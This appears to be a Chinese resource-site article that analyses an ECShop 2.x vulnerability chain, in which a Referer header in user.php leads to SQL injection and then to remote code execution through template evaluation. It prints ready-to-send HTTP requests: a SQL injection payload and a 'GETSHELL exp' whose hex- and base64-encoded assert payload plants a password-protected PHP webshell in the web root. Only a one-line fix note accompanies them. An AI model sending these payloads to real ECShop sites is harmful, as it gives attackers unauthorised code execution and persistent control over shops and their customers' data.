最新公告
  • 欢迎加入阿奇源码资源网团队,精品资源持续增加!立即加入我们
  • ecshop2.x代码执行

    广告!请自辨真伪 广告!请自辨真伪 广告!请自辨真伪
    云产品限时秒杀,1核2G首年99元 限时注册送一年会员,注册自动到账

    前言

    问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行

    漏洞分析

    0x01-SQL注入

    先看user.php

    $back_act变量来源于HTTP_REFERER,我们可控。

    assign函数用于在模版变量里赋值

    再看display函数

    读取user_passport.dwt模版文件内容,显示解析变量后的html内容,用_echash做分割,得到$k然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$val内容可随意控制。

    再看insert_mod函数

    非常关键的一个地方,这里进行了动态调用

    $val传入进来用|分割,参数传入进来时需要被序列化

    再看include/lib_insert.php中的insert_ads函数

    可以看到这里直接就能注入了

    payload:

    GET /user.php?act=login HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
    Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    
    

    0x02-代码执行

    继续看fetch函数

    追踪_eval函数

    $position_style变量来源于数据库中的查询结构

    然后我们继续构造SQL注入,因为这段sql操作 order by部分换行了截断不了 所以需要在id处构造注释来配合num进行union查询

    payload

    SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1535678679' AND end_time >= '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,2,3,4,5,6,7,8,9,10-- -

    函数中有一个判断

    我们 id传入’/*

    num传入*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10– -就能绕过了

    var_dump一下

    再看fetch函数,传入的参数被fetch_str函数处理了

    追踪fetch_str函数,这里的字符串处理流程比较复杂

    return preg_replace("/{([^/}/{/n]*)}/e", "/$this->select('//1');", $source);

    这一行意思是比如$source是xxxx{$asd}xxx,那么经过这行代码处理后就是返回this->select(‘$asd’)的结果

    看看select函数

    第一个字符为$时进入$this->get_val函数

    我们$val没有.$又进入make_var函数

    最后这里引入单引号从变量中逃逸

    我们要闭合_var所以最终payload是

    {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ=='));//}xxx

    会在网站跟目录生成1.txt 里面内容是getshell

    GETSHELL exp:

    GET /user.php?act=login HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
    Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    
    

    会在网站根目录生成1.php 密码是1337

    修复建议

    intval $arr[id]和$arr[num]

    thanks

    感谢xyz老哥

    声明:本站发布的文章及附件仅限用于学习和研究目的.请勿用于商业或违法用途,否则后果请用户自负。 本站所有资源不带技术支持,下载资源请24小时内删除,如用于违法用途,或者商业用途,一律使用者承担。

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!hnymwl@foxmail.com
    2. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!
    3. 如果你也有好源码或者教程,可以到审核区发布,分享有金币奖励和额外收入!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    7. 本站不保证所提供下载的资源的准确性、安全性和完整性,源码仅供下载学习之用!
    8. 如用于商业或者违法用途,与本站无关,一切后果请用户自负!
    阿奇源码 » ecshop2.x代码执行

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    开通终身会员能下载全站资源码?
    可以100%下载全站源码资源的,除部分失效资源,失效的可以联系客服尝试恢复。

    发表评论